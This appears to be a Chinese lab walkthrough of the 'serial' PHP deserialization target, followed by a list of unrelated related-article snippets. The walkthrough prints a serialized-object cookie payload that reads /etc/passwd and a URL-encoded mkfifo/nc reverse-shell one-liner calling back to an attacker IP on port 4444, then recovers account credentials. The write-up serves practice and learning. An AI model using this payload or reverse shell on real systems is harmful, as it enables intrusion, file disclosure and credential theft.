php反序列化靶机serial实战
扫描ip,找到靶机ip后进入
他说这是cookie的测试网页,我们抓个包,得到cookie值
base64解码
扫描一下靶机ip的目录
发现http://192.168.88.153/backup/,访问
下载一下发现是他的网页源码
通过代码审计,发现
通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。
构造payload
<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));
?>获取到base64编码后的字节序列
抓包,将编码后的数据抓包后替换
放包
查看到passwd
写一个1.txt,内容为
修改palyload为
访问99.php
在攻击模块中替换,并查询ip
成功执行
开始反弹shell
rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f
上述代码是特定url编码后的填入参数位置,在kali里开启监听
在攻击模块发送
成功获取shell
查看文件,多返回几次上级目录,找到一个txt文件
查看文件 得到sk4账号密码
远程连接
相关文章:
php反序列化靶机serial实战
扫描ip,找到靶机ip后进入 他说这是cookie的测试网页,我们抓个包,得到cookie值 base64解码 扫描一下靶机ip的目录 发现http://192.168.88.153/backup/,访问 下载一下发现是他的网页源码 通过代码审计,发现 通过代码审计得知&…...
类型推断技术及仓颉语言实践
史磊 仓颉语言类型推断技术专家 一、一种看待类型系统的方式 一门编程语言一定得包含类型系统吗? 这个问题今天看来可能显而易见,一个程序没有类型的话还能算是个完整、正确的程序吗?但是其实关于类型系统的作用,一直是存在两种…...
职场生存秘籍:16条黄金法则
作者简介:一名计算机萌新、前来进行学习VUE,让我们一起进步吧。 座右铭:低头赶路,敬事如仪 个人主页:我叫于豆豆吖的主页 写在前面 在这个瞬息万变的时代,职场不仅是实现个人价值与梦想的舞台,更是一…...
Flask 介绍
Flask 介绍 为什么要学 Flask框架对比设计哲学功能特点适用场景学习曲线总结 Flask 的特点Flask 常用扩展包Flask 的基本组件Flask 的应用场景官方文档官方文档链接文档内容概述学习建议 Flask 是一个使用 Python 编写的轻量级 Web 应用框架。它旨在让 Web 开发变得快速、简单且…...
JAVA基础知识点3 (String 和 StringBuffer 以及 StringBuilder 的特点以及区别)
1,String 和 StringBuffer 以及 StringBuilder 的特点 (1)String的特点:String是final修饰的字符序列是不可改变的, 是字符串常量,一旦初始化就不可以被更改,因此是线程安全的 因为是常量每次对其操作都会…...
2024年8月AI内容生成技术的现状与未来:从文生文到跨模态交互的全景分析
2024年8月AI内容生成技术的现状与未来:从文生文到跨模态交互的全景分析 大家好,我是猫头虎!🚀 随着AI在内容生成领域的爆发式发展,从2022年末开始,AI生成技术已经走过了文生文(AIGC)…...
File 34
package File;import java.awt.*; import java.io.File;public class file1 {public static void main(String[] args) {//创建FILE对象,指代某个具体的文件//路径分隔符File f1new File("C:/Users/SUI/Desktop/kaishi/nih.txt");// File f1new File(&quo…...
AI全知道-Embedding model中的Vector知识点
在嵌入模型(Embedding Model)中,向量(Vector)是核心概念之一。向量表示法不仅是数学中的基本工具,也是机器学习和深度学习中处理高维数据的关键手段。本文将深入探讨向量在嵌入模型中的作用、表示方法、计算和应用等知识点。 一、向量的基本概念 向量是一个具有方向和大…...
Qt 学习第四天:信号和槽机制(核心特征)
信号和槽的简介 信号和插槽用于对象之间的通信。信号和插槽机制是Qt的核心特征,可能是不同的部分大部分来自其他框架提供的特性。信号和槽是由Qt的元对象系统实现的。介绍(来自Qt帮助文档Signals & Slots) 在GUI编程中,当我们…...
跳跃游戏Ⅱ C++简单代码
给定一个长度为 n 的 0 索引整数数组 nums。初始位置为 nums[0]。 每个元素 nums[i] 表示从索引 i 向前跳转的最大长度。换句话说,如果你在 nums[i] 处,你可以跳转到任意 nums[i j] 处: 0 < j < nums[i] i j < n 返回到达 nums[n - 1] 的最…...
Gitlab中access token 和Deploy token的区别
在GitLab中,Access Token和Deploy Token是两种不同类型的令牌,用于不同的目的。以下是它们的主要区别: ### Access Token 1. **用途**: - 用于用户身份验证,允许用户以编程方式访问GitLab API。 - 可以用于克隆…...
【多线程】线程的五种创建方法
文章目录 线程在 Java 代码中编写多线程程序Thread 标准库 创建线程的写法1 . 继承 Thread 类代码回调函数休眠操作:sleep()抢占式执行观察线程jconsoleIDEA 内置调试器 2 . 实现 Runnable 接口代码 3. 匿名内部类创建 Thread ⼦类对象代码匿名内部类 4.匿名内部类创…...
关闭窗口工具类 - C#小函数类推荐
此文记录的是一个关于关闭窗口工具类。 /***关闭窗口工具类Austin Liu 刘恒辉Project Manager and Software DesignerE-Mail: lzhdim163.comBlog: http://lzhdim.cnblogs.comDate: 2024-01-15 15:18:00使用方法:CloseWindowUtil.CloseWindow(this.Handle);***/n…...
Xilinx FPGA 原语解析(一):IBUFDS_GTE3 差分时钟输入缓冲器
目录 1.使用说明 2.实例化代码 3.参数解释 4.端口连接 1.使用说明 IBUFDS_GTE3 是Xilinx FPGA 中用于高速接口的差分时钟信号输入缓冲器。 BUFDS_GTEx,x2/3/4(不同系列的FPGA x的值不同),其中UltraScale使IBUFDS_GTE3…...
力扣SQL50 患某种疾病的患者 正则表达式
Problem: 1527. 患某种疾病的患者 在SQL查询中,REGEXP 是用于执行正则表达式匹配的操作符。正则表达式允许使用特殊字符和模式来匹配字符串中的特定文本。具体到你的查询,^DIAB1|\\sDIAB1 是一个正则表达式,它使用了一些特殊的通配符和符号。…...
k8s集群的资源发布方式(滚动/蓝绿/灰度发布)及声明式管理方法
目录 1.常见的发布方式 2.滚动发布 3.蓝绿发布 4.实现金丝雀发布(Canary Release) 5.声明式管理方法 1.常见的发布方式 蓝绿发布:两套环境交替升级,旧版本保留一定时间便于回滚优点:用户无感知,部署和回滚速度较…...
SwiftUI 中掌握 ScrollView 的使用:滚动可见性
文章目录 前言视图修饰符应用场景可见性完整示例ContentViewVideoPlayerViewScrollViewVisibilityApp 总结 前言 我们的滚动 API 中又有一个重要的新增功能:滚动可见性。现在,你可以获取可见标识符列表,或者快速检查并监控 ScrollView 内视图…...
中药养发护发
按照中医理论,头发和肝肾有密切联系,肝主血,肾藏精, 其华在发,肝肾强健,上荣于头,则毛发乌黑浓密. 中药育发的应用 以当归,天麻,桑疹子养血润发,配合干姜祛风活血,能通畅经络, 加快循环,激活毛囊,能促进皮肤组织营养成分吸收和废弃物的排泄,改善 头发生态. 用苦参 皂角 清热化…...
Java面试题-集合类
目录 1、请简单介绍下 Java 的集合类吧。 Collection Set TreeSet和HashSet List ArrayList 和 LinkedList 数组和链表的区别 Java 的列表有哪些实现类? Vector Queue Map 能说下 HashMap 的实现原理吗? 能说下 HashMap 的扩容机制吗&#x…...
【Vue3】组件通信之v-model
【Vue3】组件通信之v-model 背景简介开发环境开发步骤及源码总结 背景 随着年龄的增长,很多曾经烂熟于心的技术原理已被岁月摩擦得愈发模糊起来,技术出身的人总是很难放下一些执念,遂将这些知识整理成文,以纪念曾经努力学习奋斗的…...
Davinci大数据可视化平台:企业级React TypeScript架构实战指南
Davinci大数据可视化平台:企业级React TypeScript架构实战指南 【免费下载链接】davinci edp963/davinci: DaVinci 是一个开源的大数据可视化平台,它可以处理大规模数据集并生成丰富的可视化报告,帮助企业或个人更好地理解和分析数据。 项目…...
【亲测免费】 Vue Design 开源项目教程
Vue Design 开源项目教程 【免费下载链接】vue-design Be the best website visualization builder with Vue and Electron. 项目地址: https://gitcode.com/gh_mirrors/vue/vue-design 项目介绍 Vue Design 是一个基于 Vue.js 的 UI 组件库,旨在提供一套美…...
安装包制作教程:将Qwen3-ForcedAligner-0.6B打包为Windows应用
安装包制作教程:将Qwen3-ForcedAligner-0.6B打包为Windows应用 1. 引言 如果你用过Qwen3-ForcedAligner-0.6B这个音文对齐工具,肯定知道它有多实用——能精确到毫秒级的时间戳标注,让字幕制作变得轻松简单。但每次都要在命令行里敲代码、配…...
Langflow全场景部署实战指南:从本地开发到云端服务
Langflow全场景部署实战指南:从本地开发到云端服务 【免费下载链接】langflow ⛓️ Langflow 是 LangChain 的用户界面,使用 react-flow 设计,旨在提供一种轻松实验和原型设计流程的方式。 项目地址: https://gitcode.com/GitHub_Trending/…...
[SGG_AI]1.Python数据分析
1.数据分析概述与环境搭建 1.1 数据分析课程导论 1.1.1 为什么要学数据分析? 功能 Excel Python (Pandas) 数据处理量 1万行以内 100万行以上 自动化 手动操作 代码一键运行 学习难度 简单 需基础编程知识 传统方法:用Excel手工处理数据…...
自动搞定MySQL记录创建与更新时间)
别再手动写时间戳了!用SQLAlchemy的Mixin和func.now()自动搞定MySQL记录创建与更新时间
告别手动维护时间戳:SQLAlchemy自动化时间管理的工程实践 每次在模型里手动维护created_at和updated_at字段时,你有没有想过——为什么2023年了我们还要像打字机时代那样处理时间戳?当团队里有三个开发者分别用datetime.now()、datetime.utcn…...
yfinance高效工具实战指南:从数据获取到智能分析
yfinance高效工具实战指南:从数据获取到智能分析 【免费下载链接】yfinance Download market data from Yahoo! Finances API 项目地址: https://gitcode.com/GitHub_Trending/yf/yfinance 在当今数据驱动的世界,获取准确、及时的金融市场数据对于…...
嘉立创专业版自建元件库实战:手把手教你搞定冷门芯片ST17H66的原理图与封装
嘉立创专业版自建元件库实战:手把手教你搞定冷门芯片ST17H66的原理图与封装 在硬件设计领域,遇到嘉立创标准元件库中未收录的冷门芯片是常有的事。最近我在一个蓝牙低功耗项目中就碰到了ST17H66这颗芯片——一款专为物联网设备设计的射频前端模块。面对标…...
SparkFun FS3000热式风速传感器Arduino驱动深度解析
1. SparkFun FS3000 Arduino库技术解析:面向嵌入式工程师的完整热力学传感器驱动开发指南1.1 传感器物理层特性与工程选型依据SparkFun FS3000空气流速传感器模块(Qwiic接口)基于Renesas FS3000 MEMS热电堆芯片,其核心传感原理并非…...
Android位置模拟技术全解析:如何突破系统定位限制?
Android位置模拟技术全解析:如何突破系统定位限制? 【免费下载链接】FakeLocation Xposed module to mock locations per app. 项目地址: https://gitcode.com/gh_mirrors/fak/FakeLocation 位置模拟技术是Android系统开发中一项重要的调试与测试…...